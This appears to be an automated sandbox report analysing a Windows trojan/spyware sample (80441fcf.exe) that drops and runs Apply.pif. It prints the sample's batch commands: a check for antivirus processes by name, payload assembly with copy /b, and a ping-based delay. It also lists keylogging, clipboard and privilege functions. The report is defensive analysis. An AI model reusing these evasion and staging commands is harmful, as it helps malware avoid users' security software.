Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64748
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64745

Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64748 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_00406747 SetWindowsHookExW 00000002,Function_000075C3,00000000,00000000

0_2_00406747

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008CF286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

12_2_008CF286

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008CF4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

12_2_008CF4F1

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

12_2_008CF286

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008BA36F GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

12_2_008BA36F

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008E9C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

12_2_008E9C62

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008C448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

12_2_008C448D

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008B18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

12_2_008B18E3

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008BEF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

12_2_008BEF37

Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00404E5F	0_2_00404E5F
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041B853	0_2_0041B853
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_004150AE	0_2_004150AE
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_004161F1	0_2_004161F1
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00416A1D	0_2_00416A1D
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_004183B0	0_2_004183B0
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041B4E1	0_2_0041B4E1
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041649B	0_2_0041649B
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0040AD0B	0_2_0040AD0B
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0040F5E4	0_2_0040F5E4
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00411D80	0_2_00411D80
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041B5BB	0_2_0041B5BB
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00415E7F	0_2_00415E7F
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00416762	0_2_00416762
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0041379E	0_2_0041379E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008581B0	12_2_008581B0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00872282	12_2_00872282
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0088A23E	12_2_0088A23E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0085E4CB	12_2_0085E4CB
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0086C4DD	12_2_0086C4DD
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008DC5CB	12_2_008DC5CB
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00858690	12_2_00858690
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C272F	12_2_008C272F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0088E852	12_2_0088E852
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008B8991	12_2_008B8991
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00886ABB	12_2_00886ABB
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00858AF0	12_2_00858AF0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0086CC3E	12_2_0086CC3E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0087CDF0	12_2_0087CDF0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0085D080	12_2_0085D080
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008E5033	12_2_008E5033
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00887129	12_2_00887129
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008716E4	12_2_008716E4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00871A56	12_2_00871A56
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00869BAD	12_2_00869BAD
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00877B6B	12_2_00877B6B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00877D9A	12_2_00877D9A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00871D00	12_2_00871D00
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_00871FC7	12_2_00871FC7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: String function: 00870D80 appears 45 times

Source: 80441fcf.exe

Static PE information: invalid certificate

Source: Cookbook.0.dr

Static PE information: No import functions for PE file found

Source: Cookbook.0.dr

Static PE information: Data appended to the last section found

Source: 80441fcf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/9@3/2

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_00407280 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,lstrcpyW,lstrcpyW,lstrcpyW,LocalFree,

0_2_00407280

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008B17A1 AdjustTokenPrivileges,CloseHandle,		12_2_008B17A1
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008B1DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		12_2_008B1DA5

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008C593C SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

12_2_008C593C

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008BDAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

12_2_008BDAC1

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_004027BC _wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,

0_2_004027BC

Source: C:\Users\user\Desktop\80441fcf.exe

Code function: 0_2_00407483 SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,

0_2_00407483

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03

Source: C:\Users\user\Desktop\80441fcf.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000

Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit

Source: 80441fcf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\80441fcf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe

File read: C:\Users\user\Desktop\80441fcf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\80441fcf.exe "C:\Users\user\Desktop\80441fcf.exe"
Source: C:\Users\user\Desktop\80441fcf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\80441fcf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 5758
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Ink 5758\o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif 5758\Apply.pif 5758\o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\Desktop\80441fcf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 5758	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Ink 5758\o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif 5758\Apply.pif 5758\o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior

Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\80441fcf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: 80441fcf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdb source: 80441fcf.exe
Source:	Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdbt?= source: 80441fcf.exe

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

12_2_00854E68

Source: Cookbook.0.dr	Static PE information: real checksum: 0xf5a21 should be: 0x427ba
Source: 80441fcf.exe	Static PE information: real checksum: 0xf1ab1 should be: 0xf50ec

